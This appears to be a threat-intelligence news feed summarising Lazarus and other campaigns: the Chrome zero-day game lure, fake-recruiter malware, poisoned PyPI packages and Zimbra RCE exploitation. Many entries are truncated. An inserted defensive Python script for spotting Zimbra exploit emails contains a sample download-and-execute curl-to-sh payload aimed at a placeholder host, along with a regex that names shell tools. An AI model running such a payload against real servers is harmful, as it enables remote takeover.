Last week's reports highlighted a range of attack types led by sophisticated state-sponsored actors and criminal threats, with notable attacks targeting the cryptocurrency, government and critical infrastructure sectors. The main attack vectors include phishing campaigns, exploitation of software vulnerabilities, and advanced malware and tools such as Cobalt Strike, ransomware and botnets, leveraging known CVEs and speculative execution flaws. State-aligned APT groups, such as Lazarus and Russia-aligned threat actors, conducted attacks against cryptocurrency platforms and political entities, while Russia-linked influence operations used AI-generated content to amplify divisive narratives ahead of the 2024 US elections. Meanwhile, botnets and ransomware-as-a-service models such as Beast RaaS demonstrated technical advances in persistence, encryption and data exfiltration techniques.
## Description
1. [Heptax campaign](https://sip.security.microsoft.com/intel-explorer/articles/CE9F9A25): Cyble Research uncovered the Heptax campaign targeting healthcare organizations through malicious LNK files distributed via phishing emails. The attackers use PowerShell scripts to lower security settings, enabling remote access, password extraction and system monitoring for prolonged data exfiltration.
2. [WrnRAT malware](https://sip.security.microsoft.com/intel-explorer/articles/118a2c8f): AhnLab identified WrnRAT malware distributed via fake gambling game sites, aimed at financially motivated data theft and control of infected systems. Once downloaded, the malware captures user screens, sends system information and terminates specific processes while disguising itself as an Internet Explorer process.
3. [FortiManager exploit](https://sip.security.microsoft.com/intel-explorer/articles/2f35a4ca): Mandiant reported UNC5820's exploitation of a FortiManager zero-day vulnerability (CVE-2024-47575) to execute code and steal configuration data. The attack targeted FortiGate devices across multiple industries, posing a risk of lateral movement through harvested credentials and device information.
4. [Black Basta's social engineering](https://sip.security.microsoft.com/intel-explorer/articles/b231776f): ReliaQuest documented Black Basta ransomware's advanced social engineering, including mass email spam and Microsoft Teams impersonation, to trick users into installing RMM tools or scanning QR codes. These tactics facilitate ransomware deployment via AnyDesk, underscoring the need for vigilant email and account security.
5. [Embargo ransomware](https://sip.security.microsoft.com/intel-explorer/articles/b7f0fd7b): ESET identified Embargo, a ransomware-as-a-service group targeting US companies, using Rust-based tools such as MDeployer and MS4Killer. Using double-extortion tactics, Embargo customizes its tools to disable security systems, encrypt files and gain persistence via safe-mode reboots and scheduled tasks.
6. [Lazarus Chrome exploit campaign](https://sip.security.microsoft.com/intel-explorer/articles/e831e4ae): Kaspersky researchers identified a campaign by Lazarus APT and BlueNoroff (Diamond Sleet and Sapphire Sleet) exploiting a zero-day vulnerability in Google Chrome to target cryptocurrency enthusiasts. The attack uses a fake
Ransomware Spam Malware Tool Vulnerability Threat Prediction Medical Cloud Technical APT 38 Guam ★★
RiskIQ.webp 2024-10-25 16:11:10 The Crypto Game of Lazarus APT: Investors vs. Zero-days
## Snapshot
Researchers at Kaspersky identified a cyberattack campaign by the Lazarus APT group (tracked by Microsoft as [Diamond Sleet](https://security.microsoft.com/intel-profiles/b982c8daf198d93a2ff52b92b65c6284243aa6af91dda5edd1fe8ec5365918c5)) and its BlueNoroff subgroup (tracked by Microsoft as [Sapphire Sleet](https://security.microsoft.com/intel-profiles/45e4b0c21eecf6012661ef6df36a058a0ada1c6be74d8d2011ea3699334b06d1)), which exploited a zero-day vulnerability in Google Chrome to execute remote code through a fake decentralized finance (DeFi) game targeting individuals in the cryptocurrency space.
## Description
The attackers used a type confusion vulnerability in V8's Maglev optimizing compiler, [CVE-2024-4947](https://security.microsoft.com/intel-explorer/cves/CVE-2024-4947/), to gain read/write access to the entire address space of the Chrome process. They then bypassed the V8 sandbox by exploiting a vulnerability in the Irregexp VM, which let them access memory outside the bounds of the register arrays, manipulate pointers and execute shellcode. The campaign relied on social engineering, including a malicious website that offered a download of a beta version of a computer game called "DeTankZone" as a lure; the game was a modified version of a legitimate game called DeFiTankLand. The initial infiltration was done through a hidden script on the website that exploited the Chrome vulnerabilities, giving the attackers full control of the victim's device. The attackers built a presence on social media platforms and attempted to contact cryptocurrency influencers to promote their malicious website.
Kaspersky reported the zero-day vulnerability to Google, which [released an update](https://chromereleases.googleblog.com/2024/05/stable-channel-update-for-desktop_15.html) fixing the issue in May 2024 in Chrome version 125.0.6422.60/.61.
## Microsoft Analysis and Additional OSINT Context
[Microsoft](https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/) attributes this activity to [Moonstone Sleet](https://security.microsoft.com/intel-profiles/8ba84cecf73bd9aca4e4ff90230dc1f277c039f78c40c1938b6f74b1b7cce20f), a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned. Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using the malicious tank game DeTankWar, also called DeFiTankWar, DeTankZone, or TankWarsZone. The game is portrayed as a nonfungible token (NFT)-enabled play-to-earn game, available on Windows, Mac, and Linux. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms, such as LinkedIn and Telegram, or by email with a link to download the game. When targeted users launch the game, the ZIP file is downloaded and multiple malicious DLLs are loaded. This leads to connections to command-and-control (C2) infrastructure using a custom malware loader Microsoft calls YouieLoad. YouieLoad loads malicious payloads in memory and creates malicious services that perform functions such as network and user discovery and browser data collection. For compromised devices of particular interest to the group, the threat actor launches hands-on-keyboard commands for further discovery and conducts credential theft. The threat actors presented themselves as game developers seeking investment or developer support and either masqueraded as a legitimate blockchain company or used fake companies such as C.C. Waterfall, a purported IT consulting organization.
Moonstone Sleet created a robust public campaign that includes the websites detankwar[.]com and defitankzone[.]com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself. In a similar campaign, Moonstone Sleet, again using its fake company C.C. Waterfall, emailed higher education organizations claiming the company was
Ransomware Malware Tool Vulnerability Threat APT 38 ★★
globalsecuritymag.webp 2024-10-24 23:33:00 The Lazarus APT group exploited a zero-day vulnerability in Chrome to steal cryptocurrency
Researchers from Kaspersky's GReAT (Global Research and Analysis Team) have uncovered a sophisticated malicious campaign conducted by the Lazarus APT group, targeting cryptocurrency investors worldwide. The attackers used a phishing site imitating a play-to-earn cryptocurrency video game, exploiting a zero-day vulnerability in Google Chrome to install spyware and steal wallet credentials from victims' devices. These findings were presented at the Security Analyst Summit 2024 in Bali. - Investigations
Vulnerability Threat APT 38 ★★
Blog.webp 2024-10-24 17:38:25 Lazarus Group Exploits Chrome 0-Day for Crypto with Fake NFT Game
North Korean hackers from Lazarus Group exploited a zero-day vulnerability in Google Chrome to target cryptocurrency investors with…
Vulnerability Threat APT 38 ★★
InfoSecurityMag.webp 2024-10-24 16:00:00 Lazarus Group Exploits Google Chrome Flaw in New Campaign
Lazarus Group exploited Google Chrome zero-day, infecting systems with Manuscrypt malware
Malware Vulnerability Threat APT 38 ★★
The_Hackers_News.webp 2024-10-24 15:23:00 Lazarus Group Exploits Google Chrome Vulnerability to Control Infected Devices
The North Korean threat actor known as Lazarus Group has been attributed to the zero-day exploitation of a now-patched security flaw in Google Chrome to seize control of infected devices. Cybersecurity vendor Kaspersky said it discovered a novel attack chain in May 2024 that targeted the personal computer of an unnamed Russian national with the Manuscrypt backdoor. This entails triggering the
Vulnerability Threat APT 38 ★★
SecurityWeek.webp 2024-10-24 13:02:10 North Korean Hackers Exploited Chrome Zero-Day for Cryptocurrency Theft
The Lazarus APT created a deceptive website that exploited a Chrome zero-day to install malware and steal cryptocurrency.
Malware Vulnerability Threat APT 38 ★★
DarkReading.webp 2024-10-23 20:55:13 Lazarus Group Exploits Chrome Zero-Day in Latest Campaign
The North Korean actor is going after cryptocurrency investors worldwide leveraging a genuine-looking game site and AI-generated content and images.
Vulnerability Threat APT 38 ★★
SecureList.webp 2024-10-23 11:00:48 The Crypto Game of Lazarus APT: Investors vs. Zero-days
Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain.
Vulnerability Threat APT 38 ★★
RiskIQ.webp 2024-10-21 11:41:26 Weekly OSINT Highlights, 21 October 2024
## Snapshot
Last week's OSINT reports highlighted a diverse range of cyber threats and evolving attack vectors. Social engineering remains a prevalent tactic, with campaigns such as ClickFix leveraging fake error messages to distribute malware, while the CL-STA-240 Contagious Interview campaign targets job seekers using malware disguised as video call applications. Information stealers such as Lumma and Meduza continue to proliferate and leverage distribution platforms like Telegram and GitHub. Ransomware actors exploit cloud services, as shown by the ransomware campaign abusing Amazon S3. Nation-state groups, including North Korea, Iran and China, persist in targeting critical infrastructure and government entities using sophisticated evasion techniques and open-source tools, while financially motivated actors focus on banking trojans and cryptocurrency theft. These trends underscore the growing sophistication and diversity of threat actors' tactics, with both nation-state APTs and cybercriminals targeting a wide range of sectors.
## Description
1. [ClickFix social engineering tactic](https://sip.security.microsoft.com/intel-explorer/articles/6d79c4e3): Sekoia researchers identified ClickFix, a new social engineering tactic leveraging fake browser error messages to execute malicious PowerShell commands. It has been used by groups such as Slavic Nation Empire and Scamquerteo to distribute infostealers, RATs and botnets targeting cryptocurrency and Web3 users.
2. [Lumma Stealer distribution via HijackLoader](https://sip.security.microsoft.com/intel-explorer/articles/ef6514e6): HarfangLab researchers observed an increase in Lumma Stealer distribution using HijackLoader with code-signing certificates to bypass defenses. These campaigns targeted users through fake CAPTCHA pages, leading to malware execution with certificates issued to legitimate companies.
3. [Meduza Stealer spread via Telegram](https://sip.security.microsoft.com/intel-explorer/articles/ac988484): CERT-UA reported Meduza Stealer distributed through Telegram messages urging users to download "special software." The malware targeted Ukrainian businesses and stole documents before self-deleting to avoid detection.
4. [Ransomware exploiting Amazon S3](https://sip.security.microsoft.com/intel-explorer/articles/f5477a4): Trend Micro identified a ransomware campaign exploiting Amazon S3's transfer acceleration feature for data exfiltration. Disguised as LockBit, this ransomware targets Windows and macOS, using AWS credentials for data uploads while leveraging encryption to pressure victims.
5. [AI abused in cyber operations](https://sip.security.microsoft.com/intel-explorer/articles/e46070dd): OpenAI reported more than 20 cases of AI misuse by malicious actors for malware development, disinformation and spear phishing. Threat actors including Storm-0817 and SweetSpecter exploited AI for tasks such as reconnaissance and code debugging, while covert influence operations were traced to Iran and Rwanda.
6. [TrickMo banking trojan variants](https://sip.security.microsoft.com/intel-explorer/articles/1f1ea18b): Zimperium researchers discovered 40 TrickMo banking trojan variants capable of OTP interception, screen recording and device
Ransomware Malware Tool Vulnerability Threat Cloud APT 38 APT 37 APT-C-17 ★★
RiskIQ.webp 2024-10-15 21:16:48 North Korean Actors Target Tech Job Seekers with Cross-Platform Malware
## Snapshot
Researchers at Unit 42 have observed additional online activity by Democratic People's Republic of Korea (DPRK) threat actors, which Unit 42 tracks as CL-STA-240 Contagious Interview, targeting individuals seeking tech industry jobs on platforms like LinkedIn. The threat actors pose as fake recruiters and use social engineering to convince job seekers to download malware disguised as legitimate video call applications such as MiroTalk and FreeConference, delivering updated versions of the BeaverTail and InvisibleFerret malware.
## Description
Unit 42 first published on the [Contagious Interview campaign](https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/) in November 2023. Since then, more fake recruiters have been reported and the malware has been observed with updated code. Specifically, BeaverTail has been recompiled using the [Qt framework](https://wiki.qt.io/About_Qt). Qt allows developers to build cross-platform applications, enabling the attackers to use a single source code base to generate applications for both Windows and macOS. The malware is capable of stealing credentials from 13 different cryptocurrency wallets on both macOS and Windows, and browser passwords on macOS. BeaverTail functions as a downloader and [infostealer](https://sip.security.microsoft.com/intel-profiles/2296d491ea381b532b24f2575f9418d4b6723c17b8a1f507d20c2140a75d16d6), facilitating initial access by retrieving and executing malicious payloads on compromised systems. The infection chain culminates with the deployment of the InvisibleFerret Python backdoor, which has capabilities for fingerprinting the infected endpoint, remote control, keylogging, exfiltrating sensitive files, and downloading the AnyDesk client for additional remote access.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat.
- Only install applications from trusted sources and official stores.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the large majority of new and unknown variants.
- Turn on [tamper protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?ocid=magicti_ta_learndoc) features to prevent attackers from stopping security services.
- Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?ocid=magicti_ta_learndoc), so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
- Enable [investigation and remediation](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?ocid=magicti_ta_learndoc) in full automated mode to allow Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Encourage users to use Microsoft Edge and other web browsers that support [SmartScreen](https://learn.microsoft.com/en-us/windows/security/operating-system-security/virus-and-threat-protection/microsoft-defender-smartscreen/), which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- For information on password management read [here](https://learn.microsoft.com/en-us/deployedge/microsoft-edge-security-password-manager-security).
- For information on social engineering prevention, read [here](https://www.microsoft.
Malware Tool Threat APT 38 ★★★
RiskIQ.webp 2024-10-02 20:01:11 Zimbra RCE Vuln Under Attack Needs Immediate Patching
## Snapshot
Proofpoint researchers identified active exploitation of a severe remote code execution vulnerability in Zimbra's SMTP server, tracked as [CVE-2024-45519](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45519). The vulnerability, which exists in the Zimbra postjournal service component used for email journaling and archiving, allows unauthenticated remote attackers to execute arbitrary commands and potentially take control of affected systems.
## Description
Beginning September 28, Proofpoint researchers observed attackers sending spoofed emails to vulnerable Zimbra servers. The emails, which appear to come from Gmail, carry base64-encoded malicious code in the CC field. This code is designed to execute as shell commands on vulnerable Zimbra servers. Proofpoint's analysis revealed that the malicious emails originate from a server in Bulgaria, and that the same server is used both to send the exploit emails and to host the second-stage payload. This suggests a relatively unsophisticated operation.
The volume of attacks has been consistent since they began and appears opportunistic rather than targeted. The vulnerability was initially identified by ProjectDiscovery, which published a proof of concept and noted that the issue stems from a failure to properly sanitize user input. Zimbra has released updates for the vulnerability but has not disclosed details of the flaw. The popularity of the Zimbra Collaboration Suite, used by thousands of businesses and millions of users, makes it a significant target for attackers, as evidenced by previous exploitation by Chinese APT actors and North Korea's Lazarus Group.
## Microsoft Analysis
The Zimbra Collaboration Suite is used by thousands of businesses and millions of users, making it a significant target for attackers. Microsoft has observed actors such as [Midnight Blizzard](https://sip.security.microsoft.com/intel-profiles/d825313b053efea45228ff1f4cb17c8b5433dcd2f86353e28be2d484ce874616), [a second tracked actor](https://security.microsoft.com/intel-profiles/19c1e80fc71ceb06a7b7cd8034e5b7b74e5c1775e4def24e9c7cf9b9b9fcf135) and Storm-1219 targeting other Zimbra vulnerabilities, including [CVE-2019-9670](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-9670) and [CVE-2022-41352](https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2022-41352/overview). Additionally, in July 2024, [Recorded Future's Insikt Group reported](https://sip.security.microsoft.com/intel-explorer/articles/7df80747) on the TAG-100 threat group exploiting [CVE-2019-9621](https://sip.security.microsoft.com/intel-explorer/cves/cve-2019-9621/) in the Zimbra Collaboration Suite to target government, intergovernmental and private-sector organizations worldwide.
## Recommendations
Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations.
- Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode) so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365
Tool Vulnerability Threat Patching APT 38 ★★
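The detection side of the exploit emails described above, as an added example that is not Proofpoint's or Zimbra's code: a mail-quarantine or log check that parses a raw message, pulls base64-looking tokens out of the address headers (the report names the CC field), decodes them and flags any that decode to shell-command syntax. The sample message and its payload are constructed here for illustration (TEST-NET address, not a real indicator); the header list and the shell-syntax regex are this example's assumptions, and a match is a triage signal, not proof of exploitation.

```python
"""Flag address headers carrying base64 that decodes to shell-command syntax.

Added example (not from Proofpoint or Zimbra). Exploitation of CVE-2024-45519
was reported to place base64-encoded commands in the CC header of spoofed
mails; this scans the address headers of a raw RFC 5322 message for such tokens.
"""
import base64
import binascii
import re
from email import message_from_bytes
from typing import Dict, List, Tuple

# Address headers worth checking (assumption: CC per the report, plus its siblings).
ADDRESS_HEADERS = ("Cc", "To", "From", "Reply-To", "Bcc")

# A run of base64 alphabet long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Shell-command syntax we would never expect in a decoded mailbox name (assumption).
SHELL_SYNTAX = re.compile(
    rb"(\$\(|\|\s*(ba|z)?sh\b|\b(curl|wget)\s|\bbash\s+-c\b|/bin/(ba|z)?sh\b|/dev/tcp/)"
)


def decoded_shell_tokens(header_value: str) -> List[Tuple[str, bytes]]:
    """Return (token, decoded bytes) for base64 tokens that decode to shell syntax."""
    hits: List[Tuple[str, bytes]] = []
    for token in B64_TOKEN.findall(header_value):
        try:
            decoded = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a long but ordinary identifier)
        if SHELL_SYNTAX.search(decoded):
            hits.append((token, decoded))
    return hits


def inspect_message(raw: bytes) -> Dict[str, List[Tuple[str, bytes]]]:
    """Map header name -> suspicious (token, decoded) pairs for one raw message."""
    msg = message_from_bytes(raw)
    findings: Dict[str, List[Tuple[str, bytes]]] = {}
    for header in ADDRESS_HEADERS:
        for value in msg.get_all(header, []):
            hits = decoded_shell_tokens(str(value))
            if hits:
                findings.setdefault(header, []).extend(hits)
    return findings


# --- constructed sample data (illustration only, not real indicators) -------
CONSTRUCTED_PAYLOAD = b"$(curl -s http://192.0.2.10/stage | sh)"
CONSTRUCTED_TOKEN = base64.b64encode(CONSTRUCTED_PAYLOAD).decode()

SAMPLE_EXPLOIT_MSG = (
    "From: someone@gmail.com\r\n"
    "To: postmaster@mail.example\r\n"
    f'Cc: "{CONSTRUCTED_TOKEN}"@gmail.com\r\n'
    "Subject: hello\r\n"
    "\r\n"
    "body\r\n"
).encode()

SAMPLE_CLEAN_MSG = (
    "From: alice@example.org\r\n"
    "To: bob@mail.example\r\n"
    "Cc: carol.longername1234567890@example.org\r\n"  # long identifier, decodes to noise
    "Subject: hello\r\n"
    "\r\n"
    "body\r\n"
).encode()


if __name__ == "__main__":
    for label, raw in (("exploit-like", SAMPLE_EXPLOIT_MSG), ("clean", SAMPLE_CLEAN_MSG)):
        found = inspect_message(raw)
        print(label, "->", {h: [d for _, d in hits] for h, hits in found.items()})
```

Running it over a quarantine dump or a postjournal log line-by-line gives a quick list of messages to pull; confirming exploitation still requires correlating with process execution on the Zimbra host, since a token that merely decodes to shell syntax is circumstantial.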
The_Hackers_News.webp 2024-09-23 12:09:00 New PondRAT Malware Hidden in Python Packages Targets Software Developers
Threat actors with ties to North Korea have been observed using poisoned Python packages as a way to deliver a new malware called PondRAT as part of an ongoing campaign. PondRAT, according to new findings from Palo Alto Networks Unit 42, is assessed to be a lighter version of POOLRAT (aka SIMPLESEA), a known macOS backdoor that has been previously attributed to the Lazarus Group and deployed in
Malware Threat APT 38 ★★
RiskIQ.webp 2024-09-20 15:50:36 North Korean APT Group Gleaming Pisces Deploys PondRAT via Poisoned Python Packages
## Snapshot
Unit 42 researchers identified an ongoing malware campaign involving poisoned Python packages, which they named PondRAT.
## Description
The campaign delivers backdoor malware targeting Linux and macOS systems via infected packages on PyPI, a popular repository for Python software. The attackers uploaded several malicious packages that led to the installation of a remote access tool (RAT). Based on significant code similarities and prior public research, the campaign has been attributed to Gleaming Pisces, a North Korean threat actor group tracked by Microsoft as [Citrine Sleet](https://security.microsoft.com/intel-profiles/byexternalid/69A6F70FA93E58F1412BF8DBFF92F001E83A5A27AF77FE7A0BF52E4E394EF623). Unit 42 assesses that this group is associated with the AppleJeus campaign and has ties to the North Korean government's Reconnaissance General Bureau. Gleaming Pisces is known to target the cryptocurrency sector, and Unit 42 researchers believe the goal of this campaign is to gain access to developers' endpoints and, through them, to compromise vendors' supply chains and customers. Malware analysis revealed similarities between PondRAT and a previously known macOS RAT called POOLRAT, further solidifying the connection to Gleaming Pisces. Both malware families share common code structures, function names, encryption keys and execution flows.
The threat actor's strategy involves uploading these poisoned Python packages to PyPI which, when installed, download and execute malicious code that infects the victim's machine. This attack method allows the malware to evade detection and remain hidden, posing a significant risk to organizations that rely on open-source software. Researchers also found that PondRAT is a lighter version of POOLRAT, suggesting the malware has evolved to meet different operational needs across Linux and macOS systems. The poisoned packages have since been removed from PyPI, but the threat underscores the dangers of supply chain attacks.
## Microsoft Analysis
The threat actor Microsoft tracks as [Citrine Sleet](https://security.microsoft.com/intel-profiles/byexternalid/69a6f70fa93e58f1412bf8dbff92f001e83a5a27af77fe7a0bf52e4e394ef623) is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain. As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and the individuals associated with it. The threat actor creates fake websites masquerading as legitimate cryptocurrency trading platforms and uses them to distribute fake job applications or to lure targets into downloading a weaponized cryptocurrency wallet or trading application based on legitimate applications. Citrine Sleet most commonly infects targets with the unique malware it developed, [AppleJeus](https://security.microsoft.com/intel-profiles/796c7ccf162d06ceaa32e04c82cd7b8025abe1d155a358319286012107a6b838?ocid=magicti_ta_ta2), which collects the information needed to seize control of the targets' cryptocurrency assets.
Citrine Sleet is tracked by other security companies as AppleJeus, Labyrinth Chollima, UNC4736 and Hidden Cobra, and has been attributed to Bureau 121 of North Korea's Reconnaissance General Bureau.
## Recommendations
Apply these mitigations to reduce
Malware Tool Threat APT 38 ★★★
News.webp 2024-09-12 14:11:31 2023-11-23 BEAVERTAIL and INVISIBLE_FERRET Lazarus Group Malware Samples
(direct link)
2023-11-23 Palo Alto Unit42: Hacking Employers and Seeking Employment: Two Job-Related This is a 2023 article by Unit42 covering two cyber campaigns, "Contagious Interview" (CL-STA-0240) and "Wagemole" (CL-STA-0241), linked to the Lazarus group (North Korea). There is a more recent campaign VMCONNECT described by Reversing Labs here 2024-09-10 Fake recruiter coding tests target devs with malicious Python packages but I don't have samples for that one. These campaigns target job-seeking activities to deploy malware and conduct espionage. Contagious Interview (CL-STA-0240): The campaign targets software developers by posing as employers and convincing them to download malicious NPM packages during fake job interviews. The malware, BeaverTail and InvisibleFerret, is cross-platform, running on Windows, Linux, and macOS. BeaverTail: A JavaScript-based malware that steals cryptocurrency wallet information and loads the second-stage payload, InvisibleFerret. InvisibleFerret: A Python-based backdoor with capabilities including fingerprinting, remote control, keylogging, and browser credential theft. It communicates with a C2 server using JSON-formatted messages and supports commands for data exfiltration and additional malware deployment. The threat actors use GitHub to host malicious NPM packages, creating accounts with minimal activity to avoid detection. Wagemole (CL-STA-0241): Wagemole involves North Korean actors using fake identities to apply for remote IT jobs, likely to funnel wages to North Korea's weapons programs and potentially conduct espionage. Exposed Infrastructure: Researchers found resumes, interview scripts, and other fraudulent materials on GitHub. These documents impersonate IT professionals and aim to gain unauthorized employment at US companies. Download Malware Threat APT 38 ★★
RiskIQ.webp 2024-09-09 11:04:46 Weekly OSINT Highlights, 9 September 2024
(direct link)
## Snapshot Last week's OSINT reporting highlights a broad spectrum of cyber threats with notable trends in malware campaigns, espionage, and ransomware attacks. Phishing remains a dominant attack vector, delivering a variety of payloads like custom backdoors, infostealers, and ransomware. Nation-state actors such as Russia's APT29 (Midnight Blizzard) and China's Earth Lusca were prominent, focusing on espionage and targeting specific regions like East Asia and the Middle East. Other notable threats included the use of deepfakes for scam campaigns and the exploitation of unpatched vulnerabilities in widely used software like Microsoft Office and WPS Office. The targeting of organizations ranged from government entities to private sector businesses, with some attacks focusing on specific industries like finance, healthcare, and technology. ## Description 1. [Unique Malware Campaign 'Voldemort'](https://sip.security.microsoft.com/intel-explorer/articles/3cc65ab7): Proofpoint researchers uncovered a phishing campaign distributing custom malware via emails impersonating tax authorities across multiple countries. The malware, likely motivated by espionage, uses advanced techniques like abusing Google Sheets for command-and-control (C2) to avoid detection. 2. [Python-Based Infostealer 'Emansrepo'](https://sip.security.microsoft.com/intel-explorer/articles/94d41800): FortiGuard Labs identified Emansrepo, a Python-based infostealer targeting browser data and files via phishing emails. The malware has evolved into a sophisticated multi-stage tool, expanding its capabilities to steal sensitive data like cryptocurrency wallets. 3. [Deepfake Scams Using Public Figures](https://sip.security.microsoft.com/intel-explorer/articles/6c6367c7): Palo Alto Networks researchers discovered deepfake scams impersonating public figures to promote fake investment schemes.
These scams, involving a single threat actor group, target global audiences with AI-generated videos hosted on domains with significant traffic. 4. [Zero-Day Vulnerabilities in WPS Office](https://sip.security.microsoft.com/intel-explorer/articles/f897577d): ESET researchers identified two zero-day vulnerabilities in Kingsoft WPS Office exploited by the APT-C-60 group. The vulnerabilities allowed attackers to execute arbitrary code in targeted East Asian countries, using malicious documents to deliver a custom backdoor. 5. [KTLVdoor Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/222628fc): Trend Micro uncovered KTLVdoor, a highly obfuscated backdoor developed by Earth Lusca, targeting Windows and Linux systems. The malware allows attackers to fully control infected systems and is primarily linked to Chinese-speaking actors. 6. [Fake Palo Alto GlobalProtect Tool](https://sip.security.microsoft.com/intel-explorer/articles/22951902): Trend Micro identified a campaign targeting Middle Eastern organizations with a fake version of Palo Alto GlobalProtect. The malware executes remote PowerShell commands and exfiltrates files while masquerading as a legitimate security solution. 7. [APT29 Targets Mongolian Government Websites](https://sip.security.microsoft.com/intel-explorer/articles/12b5ac31): Google TAG discovered that Russian APT29 used iOS and Chrome exploits to target Mongolian government websites. The attack, linked to commercial surveillance vendors, involved watering hole attacks to steal authentication cookies from targeted users. 8. [MacroPack-Abused Malicious Documents](https://sip.security.microsoft.com/intel-explorer/articles/cd8dec3b): Cisco Talos found malicious documents leveraging MacroPack to deliver payloads like Havoc and PhantomCore RAT. These documents used obfuscated macros and lures in multiple languages, complicating attribution to any single threat actor. 9. 
[Underground Ransomware by RomCom Group](https://sip.security.microsoft.com/intel-explorer/articles/e2a44c7c): FortiGuard Labs identified the Underground ransomware targeting Windows systems, deployed by the Russia-based RomCom Ransomware Malware Tool Vulnerability Threat Prediction Medical Commercial APT 38 APT 29 ★★
RiskIQ.webp 2024-09-06 20:50:58 (Déjà vu) APT Lazarus: Eager Crypto Beavers, Video calls and Games
(direct link)
## Snapshot Group-IB published a report detailing activity by the Lazarus Group that targets job seekers through fake interviews. The campaign lures victims into downloading malware disguised as a Node.js project, which contains the BeaverTail malware, ultimately leading to the deployment of a Python backdoor known as InvisibleFerret. ## Description The infection chain begins when victims are contacted via job-search platforms such as LinkedIn, Moonlight or Upwork. Conversations are then often moved to Telegram, where victims are tricked into downloading a fake video conferencing application or a Node.js project for a supposed interview task. These applications are in fact malicious, containing payloads that steal sensitive data from browsers, cryptocurrency wallets and other sources. The BeaverTail malware, initially developed by the threat actors as a JavaScript-based tool, has evolved to include native macOS and Python versions. The Windows version arrives via an installer file named FCCCall, which poses as a legitimate video conferencing application. On execution, FCCCall mimics legitimate software interfaces while running malicious background processes that exfiltrate browser credentials, cryptocurrency wallet data and more.
The Python variant of BeaverTail introduced modular components, collectively named CivetQ, which expand the malware's capabilities. The CivetQ modules focus on tasks such as keylogging, clipboard theft, browser data exfiltration and establishing persistence on Windows, macOS and Linux platforms. The Python version also configures AnyDesk for unattended access, allowing attackers to maintain a foothold on compromised systems without user interaction. InvisibleFerret, a Python-based backdoor, is another significant component used in these campaigns. It features remote control, keylogging and browser data theft capabilities, with recent updates incorporating more advanced obfuscation techniques and additional data exfiltration methods, including via Telegram. BeaverTail and InvisibleFerret are under active development, with frequent updates being rolled out to improve stealth and effectiveness. The Lazarus Group also uses malicious repositories on code-sharing platforms to distribute cross-platform Node.js projects. These repositories often target professionals in the cryptocurrency and gaming sectors by posing as legitimate development projects. Lazarus continuously updates these repositories, using obfuscation techniques and manipulating repository visibility to evade detection. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/en-us/defender-endpoint/linux-preferences) in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown threats. - Run [EDR in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide?ocid=Magicti_TA_LearnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Micr Ransomware Malware Tool Threat APT 38 ★★
Mandiant.webp 2024-09-03 14:00:00 DeFied Expectations - Examining Web3 Heists
(direct link)
Written by: Robert Wallace, Blas Kojusner, Joseph Dobson
Where money goes, crime follows. The rapid growth of Web3 has presented new opportunities for threat actors, especially in decentralized finance (DeFi), where the heists are larger and more numerous than anything seen in the traditional finance sector. Mandiant has a long history of investigating bank heists. In 2016, Mandiant investigated the world's largest bank heist that occurred at the Bank of Bangladesh and resulted in the theft of $81 million by North Korea's APT38. While the group's operations were quite innovative and made for an entertaining 10-episode podcast by the BBC, it pales in comparison to Web3 heists. In 2022, the largest DeFi heist occurred on Sky Mavis' Ronin Blockchain, which resulted in the theft of over $600 million by North Korean threat actors. While North Korea is arguably the world's leading cyber criminal enterprise, they are not the only player. Since 2020, there have been hundreds of Web3 heists reported, which has resulted in over $12 billion in stolen digital assets. Source: Chainalysis 2024 Crypto Crime Report. While social engineering, crypto drainers, rug pulls (scams), and
